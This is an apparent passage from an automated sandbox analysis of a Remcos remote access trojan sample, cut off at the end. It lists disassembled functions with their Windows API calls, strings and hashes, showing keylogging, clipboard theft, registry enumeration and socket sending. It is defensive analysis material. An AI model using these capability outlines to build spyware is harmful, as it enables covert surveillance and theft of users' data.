                                                  Function 0213533C Relevance: 13.7, APIs: 9, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                  • Instruction ID: f323c036b52ba2a56e51905ad2900a0c754ba631ec0ba96165e2cd945cd91396
                                                  • Opcode Fuzzy Hash: 5328bd0f7edc37ac40c0d0f8fad2384ac8a9632e9013bb03371bda9eca2e0847
                                                  • Instruction Fuzzy Hash: B251BE31940289AFCB16DB78C840BEEBBF3FF09314F5401A9E899AB251D776A805CB50
                                                  Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                  • _free.LIBCMT ref: 00444714
                                                  • _free.LIBCMT ref: 0044472D
                                                  • _free.LIBCMT ref: 0044475F
                                                  • _free.LIBCMT ref: 00444768
                                                  • _free.LIBCMT ref: 00444774
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                  • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                  • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                  • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                  Function 02134660 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02137126: GetLastError.KERNEL32(?,0212E4C7,02129583,0212E4C7,00475B70,?,0212BBBC,FF8BC35D,00475B70,00473EE8), ref: 0213712A
                                                    • Part of subcall function 02137126: _free.LIBCMT ref: 0213715D
                                                    • Part of subcall function 02137126: SetLastError.KERNEL32(00000000,FF8BC35D,00475B70,00473EE8), ref: 0213719E
                                                    • Part of subcall function 02137126: _abort.LIBCMT ref: 021371A4
                                                  • _memcmp.LIBVCRUNTIME ref: 0213490A
                                                  • _free.LIBCMT ref: 0213497B
                                                  • _free.LIBCMT ref: 02134994
                                                  • _free.LIBCMT ref: 021349C6
                                                  • _free.LIBCMT ref: 021349CF
                                                  • _free.LIBCMT ref: 021349DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                  • String ID: C
                                                  • API String ID: 1679612858-1037565863
                                                  • Opcode ID: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                  • Instruction ID: 6737df5ad712d193fa455e55e4691fcff6a832fa232b704b28311043e8db3c25
                                                  • Opcode Fuzzy Hash: 4ee3c7c2bc2adc8e7b8f5f7d65043758b13cb49f9f14cb5bf46d27c87fe2b158
                                                  • Instruction Fuzzy Hash: 71B12975A412299FDB25DF28C884BADB7B6FF08314F1045EAD949A7350E731AE90CF84
                                                  Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tcp$udp
                                                  • API String ID: 0-3725065008
                                                  • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                  • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                  • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                  Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004017BC
                                                    • Part of subcall function 004334CF: RtlEnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: RtlLeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                  • RtlExitUserThread.KERNEL32(00000000), ref: 004017F4
                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                    • Part of subcall function 00433519: RtlEnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                    • Part of subcall function 00433519: RtlLeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                  • String ID: T=G$p[G$>G$>G
                                                  • API String ID: 2307665288-2461731529
                                                  • Opcode ID: fe5e90c52b2a4af00fa55c4818981a24768df651f037b413a0e828960f6e16ee
                                                  • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                  • Opcode Fuzzy Hash: fe5e90c52b2a4af00fa55c4818981a24768df651f037b413a0e828960f6e16ee
                                                  • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                  Function 020F19CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 020F1A23
                                                    • Part of subcall function 02123736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 02123740
                                                    • Part of subcall function 02123736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 02123773
                                                  • RtlExitUserThread.NTDLL(00000000), ref: 020F1A5B
                                                  • waveInUnprepareHeader.WINMM(00001E64,00000020,00000000,?,00000020,00473EE8,00000000), ref: 020F1B69
                                                    • Part of subcall function 02123780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 0212378B
                                                    • Part of subcall function 02123780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 021237C8
                                                    • Part of subcall function 02123B0C: __onexit.LIBCMT ref: 02123B12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
                                                  • String ID: T=G$p[G$>G$>G
                                                  • API String ID: 2307665288-2461731529
                                                  • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                  • Instruction ID: 925499f992ede78824ae4b736b48d55a8e5378c547b3e9145df889d97537e94e
                                                  • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                  • Instruction Fuzzy Hash: 5841B4316843009FD3A5FB28DC95EEE73A6FB90310F44452DEB19865E0DF30A945EE59
                                                  Function 02102EEF Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 02102F28
                                                    • Part of subcall function 02102C11: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 02102C84
                                                    • Part of subcall function 02102C11: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 02102CB3
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 02103098
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                  • String ID: TUF$TUFTUF$>G$DG$DG
                                                  • API String ID: 3114080316-72097156
                                                  • Opcode ID: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
                                                  • Instruction ID: 46190e3c750b0277a8e17d09b7b4d053bfb41f61ea88826857e603f728f96072
                                                  • Opcode Fuzzy Hash: 09c09115532b36cedb4214abfd7c567596c85741be2dd330b3884bc25d138105
                                                  • Instruction Fuzzy Hash: DE41A5316883005FD268F724DC91AEF7396AFE4340F50842EEF4A57694EF249D099E66
                                                  Function 020F9D77 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 020F9DA6
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 020F9DB2
                                                  • GetKeyboardLayout.USER32(00000000), ref: 020F9DB9
                                                  • GetKeyState.USER32(00000010), ref: 020F9DC3
                                                  • GetKeyboardState.USER32(?), ref: 020F9DCE
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 020F9E83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                  • String ID: 8[G
                                                  • API String ID: 3566172867-1691237782
                                                  • Opcode ID: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                  • Instruction ID: 4eec592af6a611d4478cb297c17ad58334dfc280eee5ee26b2326f0220c79d59
                                                  • Opcode Fuzzy Hash: 0057a6b8e9be89c2a124ace2c7aa15ce6e2280d77a8450e2501583d43799386c
                                                  • Instruction Fuzzy Hash: 18318D72544308AFD710DF90DC84FDBBBECEB88715F00083ABA45961A1E7B1E548DBA2
                                                  Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                    • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                    • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                  • String ID: .part
                                                  • API String ID: 1303771098-3499674018
                                                  • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                  • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                  • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                  • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                  Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                    • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                    • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                  • _wcslen.LIBCMT ref: 0041A8F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                  • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                  • API String ID: 3286818993-703403762
                                                  • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                  • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                  • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                  • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                  Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                  • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                  • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                  • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$Window$AllocOutputShow
                                                  • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                  • API String ID: 4067487056-2527699604
                                                  • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                  • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                  • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                  Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                  • __alloca_probe_16.LIBCMT ref: 004499E2
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                  • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                  • __freea.LIBCMT ref: 00449B37
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • __freea.LIBCMT ref: 00449B40
                                                  • __freea.LIBCMT ref: 00449B65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                  • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                  • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                  • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                  Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendInput.USER32 ref: 00418B08
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                  • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                    • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InputSend$Virtual
                                                  • String ID:
                                                  • API String ID: 1167301434-0
                                                  • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                  • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                  • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                  • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                  Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 00415A46
                                                  • EmptyClipboard.USER32 ref: 00415A54
                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                  • OpenClipboard.USER32 ref: 00415A61
                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                  • CloseClipboard.USER32 ref: 00415A89
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                  • String ID:
                                                  • API String ID: 2172192267-0
                                                  • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                  • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                  • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                  • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                  Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00447EBC
                                                  • _free.LIBCMT ref: 00447EE0
                                                  • _free.LIBCMT ref: 00448067
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                  • _free.LIBCMT ref: 00448233
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                  • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                  • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                  • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                  Function 021380A1 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 02138123
                                                  • _free.LIBCMT ref: 02138147
                                                  • _free.LIBCMT ref: 021382CE
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 021382E0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 02138358
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 02138385
                                                  • _free.LIBCMT ref: 0213849A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                  • Instruction ID: 07a6f174e47c0b4e89cadc8e78b9e1731051747a8228c18a9562be5af8e1f563
                                                  • Opcode Fuzzy Hash: 15f6b1feb3d3775b51f59aeb9f2b7affb26a76ec7276939fd337acb65b8e2728
                                                  • Instruction Fuzzy Hash: 00C14B71984209AFDB26DF79DC40BAEBBBBEF41320F15456AF49497290E7318E42CB50
                                                  Function 02142D91 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0214306A,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 02142E3D
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142EC0
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0214306A,?,0214306A,00000000,00000000,?,00000001,?,?,?,?), ref: 02142F53
